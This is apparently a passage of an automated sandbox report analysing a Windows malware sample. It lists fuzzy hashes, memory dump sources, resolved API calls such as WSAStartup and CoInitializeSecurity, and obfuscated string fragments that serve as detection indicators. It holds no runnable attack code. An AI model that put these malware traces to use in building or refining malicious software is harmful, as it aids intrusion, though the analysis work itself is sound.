                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ead48db058498347acb751522f1921f184dee1dbe5bcc703478af13c59f137e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F771AB76B483104BD728DE64C8D073BB782EB98314F19D93EDAC667381E6786C1187D6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 66f626537c71d7aadcc13e15fafcf78c42570548889b15f19e963c9cf9d52cbb
                                                                                                                                                                                                                                              • Instruction ID: a9c23359af84cc21e23275746effcc7269a089668dac3d18fe8788ba91c5a8cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f626537c71d7aadcc13e15fafcf78c42570548889b15f19e963c9cf9d52cbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 497148747083205BD7149F25EC92A7B73A1DFC6314F98943EE4868B391E67CA806C35A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8afe951c43951d671385ec563c85d391c9afa19aeff77f12fb05ec13812c7a46
                                                                                                                                                                                                                                              • Instruction ID: d95e02464425a43eaef4ecf67336b58f5a47514e18bb587270472b221974b0a9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8afe951c43951d671385ec563c85d391c9afa19aeff77f12fb05ec13812c7a46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351F633F205114B9718CF69DC525AF73A3E7C9314B6A963EC822E7294DA38DD0286C9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 697ffb298cdd0d7265bc8b4f9ac907118a939b01550197eb7fae985e477d01b2
                                                                                                                                                                                                                                              • Instruction ID: 990f49fba60c3a1a6c94dd758f95b17b88cdaabaa4d35143995dd83d9473ad43
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 697ffb298cdd0d7265bc8b4f9ac907118a939b01550197eb7fae985e477d01b2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE513A39B443009BE7189F69DC90B7BB792EBD8310F19953DE896533E0DA39AC09C749
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 8262d4f10d77bcb9eb74e415945a28684f8670af73a6f807e316791603ff5fe3
                                                                                                                                                                                                                                              • Instruction ID: 6915aa18b07d9d17e38c6d984b53141ee5d10fd8ddaa2e57d9ae7f6e326c45fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8262d4f10d77bcb9eb74e415945a28684f8670af73a6f807e316791603ff5fe3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3431E237A105104BDB1CCF68CC5277A7292E789315F6A962EC813EB2E5DA745C028788
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 144aae91edc0d65044003935e2a10a512176c32bc3c5d8ce26c1504ab4a15192
                                                                                                                                                                                                                                              • Instruction ID: 0fae95f8a8a16c212c24583100b634e944e7160a773601560c9025520cf195fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 144aae91edc0d65044003935e2a10a512176c32bc3c5d8ce26c1504ab4a15192
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5831C436B102054BEB1CCEA8DCA2BBE7363E7C5314F29912DD9129B2D4DF785D068745
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 91de01c23a386bf8e85c45390db4ad28f50f60faf13a36dc33f76ae0af12e667
                                                                                                                                                                                                                                              • Instruction ID: 128dc40ed1c7fdaaea16417f5870d9fb985e1018be89d3502ed24059acbd577a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91de01c23a386bf8e85c45390db4ad28f50f60faf13a36dc33f76ae0af12e667
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C631F537E20160479F1CCF68EC6267E73A3EB89315B5E957DC953A7291DE349C028788
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043C74C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 2f7600e318456a12395069fdd4a85b6e9fc90c00c62735cf5287de99d1559589
                                                                                                                                                                                                                                              • Instruction ID: 8f002d91bdeca3fa21edc8c9f8fcf0c04cffd6be370c740cb867fdad84eeb23f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f7600e318456a12395069fdd4a85b6e9fc90c00c62735cf5287de99d1559589
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0F63A948112EBC6106F25BC05A1B7378DF8B321F011439F40953111EB38D811D6AF
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: 549c14ed47b4c10347ef748b26a5d00f03ff47930fc7942e4991c13974b0fda9
                                                                                                                                                                                                                                              • Instruction ID: c59e547b3bc55eb8e65bb54acff9741ceb6cf3db7379961af74f48598cfa5155
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549c14ed47b4c10347ef748b26a5d00f03ff47930fc7942e4991c13974b0fda9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A601E7B49087028FE310DF25D498B56BBE1FB84308F11882CE4A58B394DBB5A589CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000,00413F22), ref: 0043AB46
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              • Opcode ID: 4c1efe6b780792c61a278fab49e9e03925425d989ce49dbe685b7dc64db5304b
                                                                                                                                                                                                                                              • Instruction ID: 9f163d060e5128e52a4d549381e6a10ade3dc30705b52d2715dc5942a9aa12e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c1efe6b780792c61a278fab49e9e03925425d989ce49dbe685b7dc64db5304b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33E01231105201EBC2301F5AAC0AB5BBBB6EB9AB62F015A7DA401961A5CB72D8418B98
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D013
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              • Opcode ID: cef12fd8fff3f28fecd0c6c9e28e2867cffb628f124554876d21a93832989865
                                                                                                                                                                                                                                              • Instruction ID: 36e51793d4ee227331f1ce8cf406bb72860a6d7854835cd0db2c8415f14b7676
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cef12fd8fff3f28fecd0c6c9e28e2867cffb628f124554876d21a93832989865
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCE02B7875320437D248971AEC47FA7322D93C7315F09423DB563D76C2CD30A80581B4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: f3356faf4201d1dc2c78fd93264b643f72b45d2b68d79b2103100722f3604e64
                                                                                                                                                                                                                                              • Instruction ID: 2dff411b8a48cfe58ce972252303d299e3edcc20acdf12bf35a4ad5ffad5669d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3356faf4201d1dc2c78fd93264b643f72b45d2b68d79b2103100722f3604e64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0D4B4108701CFE314DF25C0A871BBBE1BB84308F50891CE0994B390C7BAA649CFD6
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00409DDC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                                                                                              • Opcode ID: 4b1e705f0b2e4ecbdab73577aaf0b4912d61eb34c83dc51814c4254c497a9364
                                                                                                                                                                                                                                              • Instruction ID: 342e80120437838faac730cf4e2e45fa022b0e8e749089258c5de8b43cafc637
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b1e705f0b2e4ecbdab73577aaf0b4912d61eb34c83dc51814c4254c497a9364
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7E02B7DB5310267E70C9F61EC7277E3356C3AE705B08843DA813C22E1DE394411C600
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D052
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              • Opcode ID: 6023feb0320b9b02c4b830bd19f4d9f6d08177e2e8d33b0f774df5ffaee30bb7
                                                                                                                                                                                                                                              • Instruction ID: 30357f2af88c338fa2ea666d56b1458522517999325f607476e75c1806feade3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6023feb0320b9b02c4b830bd19f4d9f6d08177e2e8d33b0f774df5ffaee30bb7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53D092343D82027BF6244B18AC53F1422515346F25F380624B3A2FE2D0CAE07101861C
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043C9E1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                              • Opcode ID: bc39e0f25a2ee6cbad0b415e84c52d1932c8997831be6e28b9602051929c9e4c
                                                                                                                                                                                                                                              • Instruction ID: 7bf3d9de88f8a3cf5b2a6805ed71ac48d9ef51854c1912fd13a87cb76cf95a64
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc39e0f25a2ee6cbad0b415e84c52d1932c8997831be6e28b9602051929c9e4c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49E012B9E402048FCB44DFA4ECE586977B4F79A346720143EE146C3391DA35E605DF48
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043AB01
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 105ceb88612a64d59b3052585eacb7b5a6aca9e57d958a351d48b8a964e8467c
                                                                                                                                                                                                                                              • Instruction ID: 99638a9deef3dfc6cc7dd237d899bbc5754c5ef854ccb647a3fdbe39c79c1fff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 105ceb88612a64d59b3052585eacb7b5a6aca9e57d958a351d48b8a964e8467c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79A01130080220AACA222F00BC08FC23F20EB202A2F0200A0B000080B2822088A2CA88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $!$!$#$#$%$%$'$'$($)$)$)$+$,$-$/$1$2$3$4$5$7$9$;$;$=$=$>$?$?$@$A$C$E$G$G$I$K$M$O$O$Q$S$U$U$W$Y$[$\$]$_$a$c$d$e$g$i$k$m$n$o$q$s$t$u$w$x$y${$|$|$}
                                                                                                                                                                                                                                              • API String ID: 0-3145234419
                                                                                                                                                                                                                                              • Opcode ID: 3ce2d9f1c5bc2b6d78548ae3f2526d6fd4f0ff79ddfcde1f4cc568e42f585da3
                                                                                                                                                                                                                                              • Instruction ID: 2ba3d001b16e20a6766dbfe18f4ad190a8e0e889b15b9b7f9afb61491fc0023a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ce2d9f1c5bc2b6d78548ae3f2526d6fd4f0ff79ddfcde1f4cc568e42f585da3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F422532190C7E989DB36C67C8C487DDBFA15B26314F0842D9C4E96B3D2C7B90B85CB66
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "s u$'w+y$+k<m$+{-}$+|,~$,{+}$/p%r$0s&u$1c&e$1t'v$23$35$35$56$6h?j$7w.y$=l:n$>g0i$B?y!$D>C0$E"O$$F:]<$Fx)z$I~$JhB$T.] $T2@4$U;W=$Z7W9$[*I,$\$bc$cd$l+j-$o]p_$p$r&$q#s%$s'k)$u&U8
                                                                                                                                                                                                                                              • API String ID: 0-2307887704
                                                                                                                                                                                                                                              • Opcode ID: 17d1a1ea9ed1a32337330ca4cbb0ddce78e7ef8395b36b806993a90f1d2dfecc
                                                                                                                                                                                                                                              • Instruction ID: 7ac134510d4c4a064a08f51626c143d79c645c4439f84dddac2ae618a2334218
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17d1a1ea9ed1a32337330ca4cbb0ddce78e7ef8395b36b806993a90f1d2dfecc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B295B560C3918BD334CF24D8417ABBBF2FB81304F85892DE9D99B251D77499068B8B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "s u$'w+y$+k<m$+{-}$+|,~$,{+}$/p%r$0s&u$1c&e$1t'v$23$35$35$6h?j$7w.y$=l:n$>g0i$B?y!$Fx)z$HI$I~$JhB$U;W=$Z7W9$\$bc$cd$l+j-$o]p_$p$r&$q#s%$s'k)
                                                                                                                                                                                                                                              • API String ID: 0-715116172
                                                                                                                                                                                                                                              • Opcode ID: d352bd08e211a1fb933d3d7bb187b7b6a1a062c1520ec0b717a8521f2359a3fe
                                                                                                                                                                                                                                              • Instruction ID: 127b11826103c615ee40430b5b6fc65f3147e2cc9f1534f046fdfebc99700db1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d352bd08e211a1fb933d3d7bb187b7b6a1a062c1520ec0b717a8521f2359a3fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60A294B560C3918BD334CF24E8417ABBBF2FB91304F45882DE4D99B251D7749A068B9B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "$0$4$<$>$R$U$V$X$d$e$i$l$l$m$p$p$r$t$u$w$w$x${
                                                                                                                                                                                                                                              • API String ID: 0-998723159
                                                                                                                                                                                                                                              • Opcode ID: 1267151702fd756eae790674c6046534372c761ad510e8995fb3dbcd84653697
                                                                                                                                                                                                                                              • Instruction ID: 0cb130ea1036f74af54040b2137e8d8a935cee2adc7c4595def3cd68d238726d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1267151702fd756eae790674c6046534372c761ad510e8995fb3dbcd84653697
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4F1B121D087E98ADB22C67C88043DDBFB15B57324F1843D9D4E9AB3D2C7740A45DB66
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: !DEF$,-$Z$A&$jXZ$sFI$z'B
                                                                                                                                                                                                                                              • API String ID: 0-218680454
                                                                                                                                                                                                                                              • Opcode ID: ee8323da335195e2ec7553a5476fc0c1afe3894216dec15ab5bbc220cd1f0a97
                                                                                                                                                                                                                                              • Instruction ID: fb0f48b61bf5d52141d30a11fd7957ef21f10efc2c9c0155200098b2902cd3b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8323da335195e2ec7553a5476fc0c1afe3894216dec15ab5bbc220cd1f0a97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BD145716183209BC728DF24C95276BB7F1FF91344F498A5DE8868B3A0E779D900CB96
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 'qDs$@uEw$Ea2c$Ea2c$Jy_{
                                                                                                                                                                                                                                              • API String ID: 0-2958150656
                                                                                                                                                                                                                                              • Opcode ID: 42aaac3ccb4499c9c7ac9672a2af6d9550c11047b1d61c2b8f4003236d62043e
                                                                                                                                                                                                                                              • Instruction ID: 7be23511d8ec661d06a5e2b4f729eb51638645a3bb4c81107a702123193eff4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42aaac3ccb4499c9c7ac9672a2af6d9550c11047b1d61c2b8f4003236d62043e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B21201769153129BC324CF28C8916ABB7F2FFC5710F19996EE8859B360E7389C41CB46
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: 0145339d8e1297551a972d44f1947888685f1b5aa153286317ee8ed8423a2cd7
                                                                                                                                                                                                                                              • Instruction ID: 9347ab673641b0542c76a32de03eb0cf3a32a71adfdf1422f6f49847fc49baaa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0145339d8e1297551a972d44f1947888685f1b5aa153286317ee8ed8423a2cd7
